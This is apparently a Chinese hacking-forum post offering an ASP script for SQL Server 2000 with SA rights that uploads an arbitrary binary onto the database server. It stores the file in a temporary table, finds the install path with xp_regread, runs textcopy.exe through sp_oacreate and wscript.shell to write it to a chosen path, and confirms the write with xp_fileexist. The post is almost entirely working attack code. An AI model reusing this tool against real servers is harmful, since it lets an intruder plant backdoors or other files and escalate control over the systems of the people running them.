使用环境:SQL2000,SA权限,常用提权扩展存在。
原理 :利用textcopy进行二进制导入导出。
asp代码如下
<%
'=============================Code by Bin & BloodSword================
dim upload,file,formName,formPath,iCount
set upload=new upload_5xsoft
set file=upload.file("myfile")
savepath = upload.form("savepath")
sahost= upload.form("sahost")
saport = upload.form("saport")
sauser = upload.form("sauser")
sapass = upload.form("sapass")
sadb = upload.form("sadb")
if file.FileSize>0 then
indata = file.infile()
'SQLEXECUTE
sqlstr = "PROVIDER=SQLOLEDB;server="&sahost&","&saport&";uid="&sauser&";pwd="&sapass&";database="&sadb&""
execsql sqlstr,indata,savepath
end if
set file=nothing
'===============subsql===================
Sub execsql(sqlstr,indata,savepath)
set conn=server.CreateObject("ADODB.connection")
conn.Open sqlstr
conn.execute "IF EXISTS (SELECT * FROM sysobjects WHERE name='safile') BEGIN DROP TABLE [safile] END;"
conn.execute "CREATE TABLE safile ON [PRIMARY] TEXTIMAGE_ON [PRIMARY];"
set rs=server.createobject("ADODB.recordset")
rs.Open "SELECT * FROM safile where id is null",conn,1,3
rs.addnew
rs("safile").appendchunk indata
rs.update
'===============update end==========
set rs = conn.execute("EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Setup', 'SQLPath'")
regpath = rs(1)
sql="declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'"""&(regpath)&"\Binn\textcopy.exe"" /S "&sahost&" /U "&sauser&" /P "&sapass&" /D "&sadb&" /T safile /C safile /W true /F """&savepath&""" /O',0,1"
conn.execute(sql)
conn.execute "IF EXISTS (SELECT * FROM sysobjects WHERE name='safile') BEGIN DROP TABLE [safile] END;"
set rs =conn.execute("EXECUTE master..xp_fileexist '"&savepath&"'")
'============
if rs(0)=1 then
response.write "OK ! Good Luck ! :)"
else
response.write "Sorry ! Bad Luck ! ):"
end if
set rs = nothing
set conn = nothing
end sub
%>